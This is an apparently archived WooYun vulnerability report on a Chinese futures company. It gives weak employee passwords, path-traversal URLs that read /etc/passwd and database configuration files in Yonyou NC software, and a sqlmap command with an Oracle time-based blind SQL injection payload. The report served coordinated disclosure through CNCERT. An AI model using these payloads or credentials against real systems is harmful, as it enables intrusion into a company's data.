漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0153835
漏洞标题:期货安全之国投中谷期货多站漏洞SQL注入&任意文件遍历&内部系统弱口令(涉及6组数据库配置\内部组织架构等)
相关厂商:国投中谷期货
漏洞作者: 管管侠
提交时间:2015-11-18 09:43
修复时间:2016-01-11 15:32
公开时间:2016-01-11 15:32
漏洞类型:敏感信息泄露
危害等级:高
自评Rank:12
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-18: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开
简要描述:
继续
详细说明:
1、弱口令
http://**.**.**.**
liujia@**.**.**.**(lj2013)
chenwei@**.**.**.**(cw2014)
....
还应该有好多
涉及大量邮件,涉及内部系统、合同什么的
组织架构
漏洞证明:
2.文件遍历,可获取6组数据库配置
https://**.**.**.**//NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
https://**.**.**.**//NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
3.接口调试,可调取数据库配置,另一种方式
https://**.**.**.**//uapws/service/
4.sql注入
python sqlmap.py -u "https://**.**.**.**/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=ajaxValiate&ajax=1" --data="TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=*" --threads=10 --technique=T --dbms=oracle
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper==&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=' AND 3743=DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(102)||CHR(82)||CHR(111),5) AND 'yCkM'='yCkM
---
数据库版本:Oracle Database 11g Enter
修复方案:
哈
版权声明:转载请注明来源 管管侠@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-11-24 15:06
厂商回复:
CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
最新状态:
暂无